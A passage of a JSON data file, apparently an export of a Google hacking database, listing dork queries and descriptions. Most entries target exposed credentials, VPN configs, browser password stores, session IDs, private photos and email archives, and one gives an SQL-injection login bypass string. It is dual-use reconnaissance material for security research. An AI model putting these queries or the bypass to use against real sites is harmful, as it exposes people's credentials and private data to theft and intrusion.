"2014-10-02", "request": "ext:cgi inurl:cgi-bin intext:#!/bin/bash", "id": 3964}, {"short description": "(intext:mail AND intext:samAccountName) AND (filetype:xlsx OR filetype:xls OR filetype:csv OR filetype:txt)", "long description": "Search for samAccountName (an ActiveDirectory attribute).  50/50 success, some usernames disclosed along with other information.", "submited": "2014-10-09", "request": "(intext:mail AND intext:samAccountName) AND (filetype:xlsx OR filetype:xls OR filetype:csv OR filetype:txt)", "id": 3965}, {"short description": "intext:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AND (ext:txt OR ext:csv OR ext:xls OR ext:lst)", "long description": "Looks for text files with SHA1 of \"password\".  These could be tips (not very useful), config files, other peoples wordlist dumps, etc", "submited": "2014-10-09", "request": "intext:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8 AND (ext:txt OR ext:csv OR ext:xls OR ext:lst)", "id": 3966}, {"short description": "intitle:FRITZ!Box inurl:login.lua", "long description": "Show open FritzBox-Router withintitle:FRITZ!Box inurl:login.lua", "submited": "2014-10-09", "request": "intitle:FRITZ!Box inurl:login.lua", "id": 3967}, {"short description": "inurl:logon.html \"CSCOE\"", "long description": "Pages containing login portals - Web Server DetectionFinds logins portals for Cisco ASA Clientless Webvpninurl:logon.html \"CSCOE\"", "submited": "2014-10-14", "request": "inurl:logon.html \"CSCOE\"", "id": 3968}, {"short description": "inurl:cgi-bin/mailgraph.cgi", "long description": "Mail statisticsAriel Anonis - @ariel_anonis", "submited": "2014-10-15", "request": "inurl:cgi-bin/mailgraph.cgi", "id": 3969}, {"short description": "filetype:log intext:org.apache.hadoop.hdfs", "long description": "Dork : filetype:log intext:org.apache.hadoop.hdfsList of Log files which contain details about internal and External ip inHadoop Grid.This Log Files generated after every batch process.--Simmant Yadav", "submited": "2014-10-21", "request": "filetype:log intext:org.apache.hadoop.hdfs", "id": 3970}, {"short description": "inurl:CHANGELOG.txt intext:drupal intext:\"SA-CORE\" -intext:7.32 -site:github.com -site:drupal.org", "long description": "inurl:CHANGELOG.txt intext:drupal intext:\"SA-CORE\" -intext:7.32 -site:github.com -site:drupal.orglook for a CHANGELOG.txt file that has drupal and SA-CORE in the text, but not the latest 7.32 patch.  Ignore github and drupal.org", "submited": "2014-11-03", "request": "inurl:CHANGELOG.txt intext:drupal intext:\"SA-CORE\" -intext:7.32 -site:github.com -site:drupal.org", "id": 3971}, {"short description": "inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.com", "long description": "inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.comsites that have robots.txt file (potentially blocking a GD for seeing) CHANGELOG.txtCan then check the CHANGELOG.txt file manually for version (not 7.32?).", "submited": "2014-11-03", "request": "inurl:robots.txt intext:CHANGELOG.txt intext:disallow ext:txt -site:github.com", "id": 3972}, {"short description": "ext:msg OR ext:eml site:gov OR site:edu", "long description": "Mails leak by Rootkit.", "submited": "2014-11-17", "request": "ext:msg OR ext:eml site:gov OR site:edu", "id": 3973}, {"short description": "ext:txt inurl:gov intext:\"Content-Type: text/plain; charset=utf-8\" AND intext:\"Received: from \"", "long description": "ext:txt inurl:gov intext:\"Content-Type: text/plain; charset=utf-8\" AND intext:\"Received: from \"Dork to find gov't emails.~ Carl", "submited": "2014-11-18", "request": "ext:txt inurl:gov intext:\"Content-Type: text/plain; charset=utf-8\" AND intext:\"Received: from \"", "id": 3974}, {"short description": "intext:\"Please Authenticate\" intitle:Peakflow", "long description": "Pages containing login portals - Web Server DetectionFinds Login portals for Arbor Peakflow (Anti-DDoS System)Twitter - @libborius", "submited": "2014-11-19", "request": "intext:\"Please Authenticate\" intitle:Peakflow", "id": 3975}, {"short description": "ext:log telnet intext:password", "long description": "Telnet logs.By Rootkit.", "submited": "2014-11-24", "request": "ext:log telnet intext:password", "id": 3976}, {"short description": "filetype:mobileconfig intext:password OR intext:pass", "long description": "filetype:mobileconfig intext:password OR intext:pass", "submited": "2014-11-24", "request": "filetype:mobileconfig intext:password OR intext:pass", "id": 3977}, {"short description": "inurl:yahoo_site_admin/credentials/", "long description": "# Exploit Title: [Yahoo Hosting db-credentials]# Google Dork: [inurl:yahoo_site_admin/credentials/]# Date: [29/11/2014]# Exploit Author: [Mohammad Shahein]# Vendor Homepage: [www.boxeffect.com ]# Tested on: Win7 ,Google Chrome Version 39.0.2171.71 m]Google the dork it will allow you to download db.conf the file will containthe following infomysql[ database name ][ database user name ][ database password ]*Mohammad Shaheen*senior Programer, BoxEffectwebsite: www.boxeffect.com", "submited": "2014-12-03", "request": "inurl:yahoo_site_admin/credentials/", "id": 3978}, {"short description": "ext:pem intext:BEGIN CERTIFICATE", "long description": "Vulnerables CA files.By Rootkit.", "submited": "2014-12-11", "request": "ext:pem intext:BEGIN CERTIFICATE", "id": 3979}, {"short description": "inurl:/elfinder/elfinder.html+intitle:\"elFinder 2.0\"", "long description": "Upload Vulnerability Elfinder 2.0inurl:/elfinder/elfinder.html+intitle:\"elFinder 2.0\"", "submited": "2014-12-22", "request": "inurl:/elfinder/elfinder.html+intitle:\"elFinder 2.0\"", "id": 3980}, {"short description": "inurl:\"installer-log.txt\" intext:\"DUPLICATOR INSTALL-LOG\"", "long description": "Files found with this google dork will show juicy information about amigration of a complete wordpress site, including the location of a .zipfile where the complete site is stored including \"wp-config.php\",\".htaccess\" and other interesting private files.This file is the result of a migration with the Wordpress plugin\"Duplicator\".Author: @felmoltor", "submited": "2014-12-31", "request": "inurl:\"installer-log.txt\" intext:\"DUPLICATOR INSTALL-LOG\"", "id": 3981}, {"short description": "inurl:dyn_sensors.htm", "long description": "MiniGoose II environmental temprature monitoring panelAuthor:@cns0x", "submited": "2015-01-06", "request": "inurl:dyn_sensors.htm", "id": 3982}, {"short description": "inurl:/cgi-bin/.cgi", "long description": "Finds open index of /cgi-bin.", "submited": "2015-01-06", "request": "inurl:/cgi-bin/.cgi", "id": 3983}, {"short description": "inurl:fckeditor -intext:\"ConfigIsEnabled = False\" intext:ConfigIsEnabled", "long description": "inurl:fckeditor -intext:\"ConfigIsEnabled = False\" intext:ConfigIsEnabledSearches for fckeditor default url and which has a config.asp file where configisenabled = true.  Unable to search for true value directly because file contains 'example' which could lead to false positive.  If found, traversing two directories up to /connectors/ should present an uploadtest.html file.This may be old, though the existing DORKS didn't call it out specifically, and google still gives a lot of hits.", "submited": "2015-01-12", "request": "inurl:fckeditor -intext:\"ConfigIsEnabled = False\" intext:ConfigIsEnabled", "id": 3984}, {"short description": "inurl:\"/server-info\" intext:\"Loaded Modules\"", "long description": "Search Apache server information though default module info_module:inurl:\"/server-info\" intext:\"Loaded Modules\"Author: @felmoltor--Felipe Molina de la Torre", "submited": "2015-01-27", "request": "inurl:\"/server-info\" intext:\"Loaded Modules\"", "id": 3985}, {"short description": "inurl:\"security/xamppdirpasswd.txt\"", "long description": "This dork shows the plain text password saved in a XAMPP installation whenthe administrator configures \"Security Console MySQL &amp; XAMPP directoryprotection\":inurl:\"security/xamppdirpasswd.txt\"Author: @felmoltor--Felipe Molina de la Torre", "submited": "2015-02-09", "request": "inurl:\"security/xamppdirpasswd.txt\"", "id": 3986}, {"short description": "filetype:xml inurl:/WEB-INF/ inurl:ftp:// -www", "long description": "Hi,This google dork to find sensitive and interesting information underWEB-INF directory via ftp protocol, for example:* Website map* Sensitive information  (user name and password for webdave)* Deployment descriptor in java (web.xml)* Servlet mapping url patternKeyword:filetype:xml inurl:/WEB-INF/ inurl:ftp:// -www--Fahad Altamimi", "submited": "2015-02-09", "request": "filetype:xml inurl:/WEB-INF/ inurl:ftp:// -www", "id": 3987}, {"short description": "\".git\" intitle:\"Index of\"", "long description": "Shows publicly browsable .git directories", "submited": "2015-02-09", "request": "\".git\" intitle:\"Index of\"", "id": 3988}, {"short description": "inurl:.cgi-bin/webproc", "long description": "inurl:.cgi-bin/webprocLogin for various type of router.By Rootkit.", "submited": "2015-02-11", "request": "inurl:.cgi-bin/webproc", "id": 3989}, {"short description": "inurl:.cgi-bin/luci", "long description": "Directory \" Powered by LuCI Trunk\".By Rootkit.", "submited": "2015-02-11", "request": "inurl:.cgi-bin/luci", "id": 3990}, {"short description": "\"jos_users\" intitle:\"Index of\"", "long description": "\"jos_users\" intitle:\"Index of\"Files of configuration of user Joomla servers.By Rootkit.", "submited": "2015-02-11", "request": "\"jos_users\" intitle:\"Index of\"", "id": 3991}, {"short description": "intitle:\"AP Router New Generation\" intext:\"Status do AP Router\"", "long description": "intitle:\"AP Router New Generation\" intext:\"Status do AP Router\"Share-Link", "submited": "2015-02-17", "request": "intitle:\"AP Router New Generation\" intext:\"Status do AP Router\"", "id": 3992}, {"short description": "\"Config\" intitle:\"Index of\" intext:vpn", "long description": "Directory with keys of vpn servers.By Rootkit.", "submited": "2015-02-19", "request": "\"Config\" intitle:\"Index of\" intext:vpn", "id": 3993}, {"short description": "inurl:/wp-content/wpbackitup_backups", "long description": "Relates to https://wordpress.org/plugins/wp-backitup/Sensitive data/site rips/db rips in public accessible foldersMr T3st3r", "submited": "2015-02-27", "request": "inurl:/wp-content/wpbackitup_backups", "id": 3994}, {"short description": "allinurl:moadmin.php -google -github", "long description": "The dork \"allinurl:moadmin.php -google -github\" show all the sites thatuses Mongo DBand the moadmin module to amministrate it.Some versions of this module allow non autenticated user to executearbitrary Unix commands sending a special POST request documented here:http://www.exploit-db.com/exploits/36251/PsyDel", "submited": "2015-03-04", "request": "allinurl:moadmin.php -google -github", "id": 3995}, {"short description": "ext:sql intext:\"alter user\" intext:\"identified by\"", "long description": "This dork will show files containing SQL instructions where theadministrator set a password for a database user.Author: @felmoltor", "submited": "2015-03-10", "request": "ext:sql intext:\"alter user\" intext:\"identified by\"", "id": 3996}, {"short description": "allintext:Copyright Smart PHP Poll. All Rights Reserved. -exploit", "long description": "The dork \"allintext:Copyright Smart PHP Poll. All Rights Reserved.-exploit\" show all the sites that uses Smart Pool php module.The login page can be bypassed using these credentialsUser: admin 'or' 1=1Password: anythingMore info here: http://www.exploit-db.com/exploits/36386/PsyDel", "submited": "2015-03-16", "request": "allintext:Copyright Smart PHP Poll. All Rights Reserved. -exploit", "id": 3997}, {"short description": "intitle:index of /weekly cpbackup", "long description": "useful for finding cpanel backups--Regards,H.R.", "submited": "2015-03-31", "request": "intitle:index of /weekly cpbackup", "id": 3998}, {"short description": "intitle:index.of +\"Indexed by Apache::Gallery\"", "long description": "Google dork for finding Private pics ;) :D#13lacKDemOn", "submited": "2015-04-03", "request": "intitle:index.of +\"Indexed by Apache::Gallery\"", "id": 3999}, {"short description": "intitle:index.of.accounts", "long description": "Dork for directory with accounts.By Rootkit.", "submited": "2015-04-03", "request": "intitle:index.of.accounts", "id": 4000}, {"short description": "intitle:index.of.dropbox", "long description": "Sensitive DirectoriesAriel Anonis - @ariel_anonis", "submited": "2015-04-23", "request": "intitle:index.of.dropbox", "id": 4001}, {"short description": "intext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:log", "long description": "Google dork to find session IDs and potentially impersonate users:intext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:logRegards,Gabor Szathmari", "submited": "2015-04-28", "request": "intext:JSESSIONID OR intext:PHPSESSID inurl:access.log ext:log", "id": 4002}, {"short description": "inurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:Drive", "long description": "## Open Seagate NAS drivesinurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:DriveJason Coleman - CISSP, GWAPTAnalyst, Security Management Program | Verizon Enterprise Solutions", "submited": "2015-04-30", "request": "inurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:Drive", "id": 4003}, {"short description": "inurl:upsstats.cgi?host", "long description": "UPS Online Devices. Enjoy!!!.By Rootkit.", "submited": "2015-05-18", "request": "inurl:upsstats.cgi?host", "id": 4004}, {"short description": "ext:csv intext:\"password\"", "long description": "This dork finds csv files containing passwords and other juicy information.Author:NickiK.", "submited": "2015-05-19", "request": "ext:csv intext:\"password\"", "id": 4005}, {"short description": "filetype:pub inurl:ssh", "long description": "This dork finds various SSH pub files.Author:NickiK.", "submited": "2015-05-26", "request": "filetype:pub inurl:ssh", "id": 4006}, {"short description": "intitle:\"Index of ftp\"", "long description": "This dork finds open ftps. This is a base dork, where you can addintext:\"ssh/\" for folder search and intext:\"-2015\" for dates and years.Author:NickiK.", "submited": "2015-05-26", "request": "intitle:\"Index of ftp\"", "id": 4007}, {"short description": "inurl:/wp-admin/admin-ajax.php?action=revslider_ajax_action", "long description": "This dork finds vulnerabel revslider plugins.In reference to the exploit submitted by Adrian M. F.https://www.exploit-db.com/exploits/37067/Author:NickiK.", "submited": "2015-05-26", "request": "inurl:/wp-admin/admin-ajax.php?action=revslider_ajax_action", "id": 4008}, {"short description": "inurl:wp-admin/ intext:css/", "long description": "The dork finds misconfigured WordPress sites.Author:NickiK.", "submited": "2015-05-27", "request": "inurl:wp-admin/ intext:css/", "id": 4009}, {"short description": "inurl:/wp-admin/post.php?post=", "long description": "This dork finds websites which could be exploitable using Adrian M. F.landing page exploit - https://www.exploit-db.com/exploits/37108/Author:NickiK.", "submited": "2015-05-27", "request": "inurl:/wp-admin/post.php?post=", "id": 4010}, {"short description": "inurl:/graphs/ intitle:RouterOs", "long description": "files containing juicy infoAriel Anonis - @ariel_anonis", "submited": "2015-05-27", "request": "inurl:/graphs/ intitle:RouterOs", "id": 4011}, {"short description": "intext:DB_PASSWORD ext:env", "long description": "This dork finds env files, usually used in Laravel configuration,containing passwords and other juicy information.Author: Augusto Pereira", "submited": "2015-05-29", "request": "intext:DB_PASSWORD ext:env", "id": 4012}, {"short description": "intitle:\"index of\" \"archive.pst\" -contrib", "long description": "Google Dork: intitle:\"index of\" \"archive.pst\" -contribAuthor: SphearisThis dork allows you to see Outlook archive files stored in the open. Thesefiles can be opened with a simple .pst viewer to read all emails itcontains.The \"-contrib\" has been added to filter Cran installations which uses adirectory structure similar to the search terms.", "submited": "2015-05-29", "request": "intitle:\"index of\" \"archive.pst\" -contrib", "id": 4013}, {"short description": "inurl:/dbg-wizard.php", "long description": "# Exploit Title: Nusphere PHP DBG wizard# Date: 02-06-2015# Vendor Homepage:  http://www.nusphere.com# Software Link: http://www.nusphere.com/products/dbg_wizard_download.htm# Version: any# Exploit Author: Alfred Armstrong# Contact: http://twitter.com/alfaguru# Website: http://figure-w.co.ukDBG Wizard is meant to be used with the DBG PHP debugger as an aid toconfiguring it correctly. It is supplied as a PHP script calleddbg-wizard.php which when placed in the root folder of a web site andexecuted provides instructions to the user about setting up their webserver so the debugger can be used.It is not meant to be present on a live site as it exposes detailsabout software configurations and versions which might allow anattacker to discover other vulnerabilities. If the DBG shared libraryis also installed it will expose that fact and potentially assist anattacker in crafting a request to start a debug session in which theycould do anything that can be done through a PHP script, includingreading files and accessing database entries.--Alfred Armstrong", "submited": "2015-06-03", "request": "inurl:/dbg-wizard.php", "id": 4014}, {"short description": "intitle:\"index of\" \"onetoc2\" \"one\"", "long description": "# Exploit Title: intitle:\"index of\" \"onetoc2\" \"one\"# Google Dork: intitle:\"index of\" \"onetoc2\" \"one\"# Date: 04/06/2015# Exploit Author: Sphearis# Vendor Homepage: NA# Software Link: NA# Version: NA# Tested on: ALL# CVE : NAThis dork allows you to see Onenote files stored in the open(*.one). Thesefiles can be read easily with Onenote or a compatible viewer, no password,no encryption.The onetoc2 is added, it's a worthless file but is always inside a foldercontaining one or several onenote files(and it obviously helps narrowingthe search to what we're looking for).", "submited": "2015-06-04", "request": "intitle:\"index of\" \"onetoc2\" \"one\"", "id": 4015}, {"short description": "intitle:\"Index of\" \"mail\" \"Inbox\" \"Sent\"", "long description": "This Dork reveal the folders of \"Inbox\" and \"Sent\" for mail servers. Enjoy.", "submited": "2015-06-10", "request": "intitle:\"Index of\" \"mail\" \"Inbox\" \"Sent\"", "id": 4016}, {"short description": "inurl:private_files", "long description": "Directory private files xD.By Rootkit.", "submited": "2015-06-10", "request": "inurl:private_files", "id": 4017}, {"short description": "filetype:pcf vpn OR Group", "long description": "Google Dork: filetype:pcf vpn OR GroupAuthor: azupwnThis dork allows you to search for publicly accessible profileconfiguration files (.pcf) used by VPN clients. These files typicallycontain usernames, password, tunneling ports, VPN server information andother information.Cheers,--azupwn", "submited": "2015-06-10", "request": "filetype:pcf vpn OR Group", "id": 4018}, {"short description": "intitle:\"index of\" \"fic\" \"ndx\"", "long description": "# Exploit Title: intitle:\"index of\" \"fic\" \"ndx\"# Google Dork: intitle:\"index of\" \"fic\" \"ndx\"# Date: 10/06/2015# Exploit Author: SphearisThis dork allows you to look for Hyperfile databases(.FIC) stored in theopen. You can simply read them in a text editor(You'll see the header andthen the database content in plain text) or you can convert them(to xml,excel, ...) with free software. In order to convert them, you also need thelinked index file (.NDX) and optional mmo file which are located in thesame directory.Some Windev/Webdev installations store usernames and other sensitiveinformation in that kind of file.", "submited": "2015-06-10", "request": "intitle:\"index of\" \"fic\" \"ndx\"", "id": 4019}, {"short description": "intitle:\"Index Of\" intext:\"iCloud Photos\" OR intext:\"My Photo Stream\" OR intext:\"Camera Roll\"", "long description": "From: Creep Mode Baby", "submited": "2015-06-17", "request": "intitle:\"Index Of\" intext:\"iCloud Photos\" OR intext:\"My Photo Stream\" OR intext:\"Camera Roll\"", "id": 4020}, {"short description": "intitle:\"index of\" inurl:\"no-ip.com\"", "long description": "# Exploit Title: intitle:\"index of\" inurl:\"no-ip.com\"# Google Dork: intitle:\"index of\" inurl:\"no-ip.com\"# Date: 17/06/2015# Exploit Author: Sphearis# Vendor Homepage: NA# Software Link: NA# Version: NA# Tested on: ALL# CVE : NAThis dork allows you to browse files stored on a personal server(home)using a dynamic dns service to update server IP.You can replace \"no-ip.com\" with any other dynamic dns hosts:\"dyndns.org\"\"ddns.net\"\"dynamic-dns.net\"\"dynip.com\"\"tzo.com\"And so on...", "submited": "2015-06-17", "request": "intitle:\"index of\" inurl:\"no-ip.com\"", "id": 4021}, {"short description": "Auth inurl:welcome ext:cgi", "long description": "A lot of Pages with logins portals.Enjoy.By Rootkit.", "submited": "2015-06-23", "request": "Auth inurl:welcome ext:cgi", "id": 4022}, {"short description": "ext:asp intext:Smart.Shell 1.0 BY P0Uy@_$3r\\/3R -", "long description": "A new WebShell interesting. Have Fun.By Rootkit.", "submited": "2015-06-23", "request": "ext:asp intext:Smart.Shell 1.0 BY P0Uy@_$3r\\/3R -", "id": 4023}, {"short description": "filetype:asmx inurl:(_vti_bin|api|webservice)", "long description": "this dork will return web service .", "submited": "2015-06-23", "request": "filetype:asmx inurl:(_vti_bin|api|webservice)", "id": 4024}, {"short description": "inurl:Citrix/MetaframeXP", "long description": "Servers Citrix web xD.By Rootkit.", "submited": "2015-06-24", "request": "inurl:Citrix/MetaframeXP", "id": 4025}, {"short description": "\"signons.sqlite\" intitle:\"index of\"", "long description": "\"signons.sqlite\" intitle:\"index of\"This dork finds firefox profiles and other softwares that use the similarformat that you can grab and put in your own firefox or other installationand reveal all passwords saved, history, bookmarks, saved cookies andpretty much everything! When you get hacked using this method it feels likeyou are getting hacked by a whole team.by _sNapper--\"The answer to every problem is One.\" -- Myself--\"Life is like war, for the most part--planning it is useless.\" -- Myself", "submited": "2015-06-24", "request": "\"signons.sqlite\" intitle:\"index of\"", "id": 4026}, {"short description": "intitle:\"Index of\" \"wwwroot\"", "long description": "Directory of wwwroot Dork. Enjoy xD.By Rootkit.", "submited": "2015-06-30", "request": "intitle:\"Index of\" \"wwwroot\"", "id": 4027}, {"short description": "\"Futon on Apache\" inurl:_utils", "long description": "Exposed CouchDB admin panelsBy Gabor Szathmari", "submited": "2015-06-30", "request": "\"Futon on Apache\" inurl:_utils", "id": 4028}, {"short description": "phpMyAdmin SQL Dump", "long description": "# Exploit Title: [phpMyAdmin SQL Dump]# Google Dork: [intext:SET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\"; = ext:txt]# Date: [6/29/2015]# Exploit Author: [Daz Holmes]", "submited": "2015-06-30", "request": "phpMyAdmin SQL Dump", "id": 4029}, {"short description": "site:pastebin.com intext:Username", "long description": "# Exploit Title: [site:pastebin.com intext:Username]# Google Dork: [Pastebin Username &amp; Password]# Date: [6/29/2015]# Exploit Author: [Daz Holmes]", "submited": "2015-06-30", "request": "site:pastebin.com intext:Username", "id": 4030}, {"short description": "inurl:access.cnf ext:cnf", "long description": "File vulnerability, reveals the path of Password Server. Have fun.This Dork is present By Rootkit.", "submited": "2015-07-08", "request": "inurl:access.cnf ext:cnf", "id": 4031}, {"short description": "intext:OLD_FOREIGN_KEY_CHECKS\"; = ext:txt", "long description": "Google dork Description: MySQL dumpGoogle search: intext:OLD_FOREIGN_KEY_CHECKS\"; = ext:txtby TN-N3SQU1K :)", "submited": "2015-07-08", "request": "intext:OLD_FOREIGN_KEY_CHECKS\"; = ext:txt", "id": 4032}, {"short description": "intitle:index.of.pubs", "long description": "Exploit title: intitle:index.of.pubsDescription: intitle:index.of.pubsSensitive DirectoriesAuthor:fidah.org", "submited": "2015-07-09", "request": "intitle:index.of.pubs", "id": 4033}, {"short description": "inurl:\"/certsrv\" intext:\"Select a task\"", "long description": "Microsoft Certificate Request Webpage.Author: Felipe Molina (@felmoltor)", "submited": "2015-07-09", "request": "inurl:\"/certsrv\" intext:\"Select a task\"", "id": 4034}, {"short description": "inurl:courier/web/ inurl:wmLogin.html filetype:html", "long description": "Identifies Accellion Secure File Transfer servers that may be vulnerable tohttps://community.rapid7.com/community/metasploit/blog/2015/07/10/r7-2015-08-accellion-file-transfer-appliance-vulnerabilities-cve-2015-2856-cve-2015-2857@lanmaster53", "submited": "2015-07-14", "request": "inurl:courier/web/ inurl:wmLogin.html filetype:html", "id": 4035}, {"short description": "inurl:\"index.php\" intext:\"ApPHP Hotel Site\" -site:\"apphp.com\"", "long description": "Dork Identifies the sites with ApPHP-Hotel-Site 3.x.x vulnerable to sqlinjection.https://packetstormsecurity.com/files/132369/ApPHP-Hotel-Site-3.x.x-SQL-Injection.htmlRegards,Karan Ramani", "submited": "2015-07-21", "request": "inurl:\"index.php\" intext:\"ApPHP Hotel Site\" -site:\"apphp.com\"", "id": 4036}, {"short description": "allinurl:awstats.pl ext:pl", "long description": "A lot of Panels with Statics Advanced. Enjoy.By Rootkit.", "submited": "2015-07-22", "request": "allinurl:awstats.pl ext:pl", "id": 4037}, {"short description": "inurl:EndUserPortal.jsp", "long description": "inurl:EndUserPortal.jspIt takes you it brings up login pages for the service desk.https://www.exploit-db.com/exploits/37667/Author: NumLock90", "submited": "2015-07-23", "request": "inurl:EndUserPortal.jsp", "id": 4038}, {"short description": "inurl:wp-admin/admin-ajax.php inurl:wp-config.php", "long description": "The dork 'inurl:wp-admin/admin-ajax.php inurl:wp-config.php' finds the'wp-config.php' file.  It contains information about the database,including the name, host (typically localhost), username, and password.This information allows WordPress to communicate with the database to storeand retrieve data (e.g. Posts, Users, Settings, etc).Name: Suyog Pawar.", "submited": "2015-07-27", "request": "inurl:wp-admin/admin-ajax.php inurl:wp-config.php", "id": 4039}, {"short description": "intext:@pwcache \"parent directory\"", "long description": "intext:@pwcache \"parent directory\"Best regards,Adam Bedard", "submited": "2015-07-27", "request": "intext:@pwcache \"parent directory\"", "id": 4040}, {"short description": "intitle:\"InterWorx-CP\" \"Forgot your password\"", "long description": "InterWorx Web Hosting Control Panel login pages.- Andy G - twitter.com/vxhex", "submited": "2015-07-27", "request": "intitle:\"InterWorx-CP\" \"Forgot your password\"", "id": 4041}, {"short description": "site:.mil + inurl:login.aspx | .asp | .html | .php | .htm", "long description": "*Google Search : site:.mil + inurl:login.aspx | .asp | .html | .php | .htmZeel Chavda", "submited": "2015-07-27", "request": "site:.mil + inurl:login.aspx | .asp | .html | .php | .htm", "id": 4042}, {"short description": "allinurl:foldercontent.html?folder=", "long description": "Devices of NAS Iomega Cloud Services.Enjoy!!!.By Rootkit.", "submited": "2015-07-28", "request": "allinurl:foldercontent.html?folder=", "id": 4043}, {"short description": "inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/", "long description": "www.exploit-db.com/exploits/37275/Dork: inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/sincerely,Zeel Chavda", "submited": "2015-08-10", "request": "inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/", "id": 4044}, {"short description": "inurl:/wp-content/plugins/inboundio-marketing/", "long description": "https://www.exploit-db.com/exploits/36478/Google Dork : inurl:/wp-content/plugins/inboundio-marketing/sincerely,Zeel Chavda", "submited": "2015-08-10", "request": "inurl:/wp-content/plugins/inboundio-marketing/", "id": 4045}, {"short description": "intext:index of sym", "long description": "Dork: intext:index of symMost of hacker use auto server symlink script and grab all the config fileof the server. Most of the script create a folder that name is sym. Allconfig file stored in this folder.Thank YouAtik Rahman", "submited": "2015-08-10", "request": "intext:index of sym", "id": 4046}, {"short description": "intext:\"Full path to a .htpasswd file in this dir:\" filetype:php", "long description": "Files containing Juicy information from web online tools for generating .htpasswd and giving full web path .by - l1kw1d", "submited": "2015-08-10", "request": "intext:\"Full path to a .htpasswd file in this dir:\" filetype:php", "id": 4047}, {"short description": "inurl:cgi-bin ext:pl intext:\"-rwxr-xr-x\"", "long description": "List of Directories of Unix and Linux webs.Enjoy!.By Rootkit.", "submited": "2015-08-12", "request": "inurl:cgi-bin ext:pl intext:\"-rwxr-xr-x\"", "id": 4048}, {"short description": "allinurl:wp-content/plugins/wptf-image-gallery/", "long description": "Description:- Aribtrary File Download Vuln.Exploit :- www.exploit-db.com/exploits/37751/Google :- allinurl:wp-content/plugins/wptf-image-gallery/Sincerely,Zeel Chavda", "submited": "2015-08-12", "request": "allinurl:wp-content/plugins/wptf-image-gallery/", "id": 4049}, {"short description": "inurl:\"/squid-reports/\" AND intitle:\"SARG reports\"", "long description": "Search the Sarg monitoring graphs of Web Proxy SQUID3Ing. Daniel Maldonadohttp://www.caceriadespammers.com.ar", "submited": "2015-08-17", "request": "inurl:\"/squid-reports/\" AND intitle:\"SARG reports\"", "id": 4050}, {"short description": "intitle:\"hp laserjet\" inurl:SSI/Auth/set_config_deviceinfo.htm", "long description": "# Exploit Title: Unprotected HP Laserjets# Google Dork: intitle:\"hp laserjet\" inurl:SSI/Auth/set_config_deviceinfo.htm# Date: 15/08/2015# Exploit Author: AnonymousChange default password or add your own password as the printers come without a password which allows others to mess with settings and print various things.", "submited": "2015-08-17", "request": "intitle:\"hp laserjet\" inurl:SSI/Auth/set_config_deviceinfo.htm", "id": 4051}, {"short description": "intext:/homedir/.cpanel-datastore/", "long description": "intext:/homedir/.cpanel-datastore dork displays publicly accessible andindexed cpanel datastores.Enjoy, Zapperlink", "submited": "2015-08-17", "request": "intext:/homedir/.cpanel-datastore/", "id": 4052}, {"short description": "intext:bbdd index.of \"/\" \"Parent Directory\"", "long description": "Databases directory info. Have Fun!Rootkit.", "submited": "2015-08-17", "request": "intext:bbdd index.of \"/\" \"Parent Directory\"", "id": 4053}, {"short description": "intitle:SN0X SHELL: WEEEEEEEEEEEEEEEEED", "long description": "Google Dork that brings up ddos shell", "submited": "2015-08-18", "request": "intitle:SN0X SHELL: WEEEEEEEEEEEEEEEEED", "id": 4054}, {"short description": "filetype:pac inurl:\"/proxy\"", "long description": "Search the Web Proxy Autodiscovery ProtocolIng. Daniel Maldonadohttp://www.caceriadespammers.com.ar", "submited": "2015-08-18", "request": "filetype:pac inurl:\"/proxy\"", "id": 4055}, {"short description": "intext:\"Unexpected Problem Occurred!\" ext:aspx", "long description": "This Error messages reveal a lot of info of servers. Enjoy xD.Rootkit Pentester.", "submited": "2015-08-19", "request": "intext:\"Unexpected Problem Occurred!\" ext:aspx", "id": 4056}, {"short description": "intitle:\"Index of\" \"DCIM\"", "long description": "A lot of Camera Photos Dump.Have Fun!.Rootkit.", "submited": "2015-08-19", "request": "intitle:\"Index of\" \"DCIM\"", "id": 4057}, {"short description": "inurl: mil|/issue.php filetype:xls", "long description": "Files containing juicy info of the involved current issuersAuthor : aye_robot", "submited": "2015-08-21", "request": "inurl: mil|/issue.php filetype:xls", "id": 4058}, {"short description": "site: edu|org + inurl:\"faculty_login.asp | .php\"", "long description": "Type: login portalsAuthor : botsec0", "submited": "2015-08-24", "request": "site: edu|org + inurl:\"faculty_login.asp | .php\"", "id": 4059}, {"short description": "intitle:\"Index of\" \"WhatsApp Images\"", "long description": "WhatsApp Images folder, usually from backups.--pmbento", "submited": "2015-08-24", "request": "intitle:\"Index of\" \"WhatsApp Images\"", "id": 4060}, {"short description": "inurl:/set_config_password.html", "long description": "Submitter: Gman The Mod-dog", "submited": "2015-08-24", "request": "inurl:/set_config_password.html", "id": 4061}, {"short description": "intitle:Error Page pageWrapper.jsp?", "long description": "\"java.lang.NullPointerException\" ErrorThanks,Xploit", "submited": "2015-08-27", "request": "intitle:Error Page pageWrapper.jsp?", "id": 4062}, {"short description": "intitle:IBM Lotus iNotes Login", "long description": "Thanks,Xploit", "submited": "2015-08-27", "request": "intitle:IBM Lotus iNotes Login", "id": 4063}, {"short description": "inurl:src/viewcvs.cgi/log/.c?=", "long description": "Vulnerable CVS logs", "submited": "2015-08-27", "request": "inurl:src/viewcvs.cgi/log/.c?=", "id": 4064}, {"short description": "intitle:Error-javax.el.ELException+error+xhtml", "long description": "An Error Occurred:\" javax.el.ELException\"Java error and gives", "submited": "2015-08-28", "request": "intitle:Error-javax.el.ELException+error+xhtml", "id": 4065}, {"short description": "\"ganglia mobile.php\"", "long description": "EDB: https://www.exploit-db.com/exploits/38030/CVE: CVE-2012-3448Also:intitle:\"Ganglia Mobile\"intitle:\"Ganglia\" inurl:\"mobile.php\"intitle:\"Grid Report\" OR intitle:\"Cluster Report\" OR intitle:\"Node View\" OR intitle:\"Host Report\" OR intitle:\"Ganglia:: \"intitle:\"Powered by Job 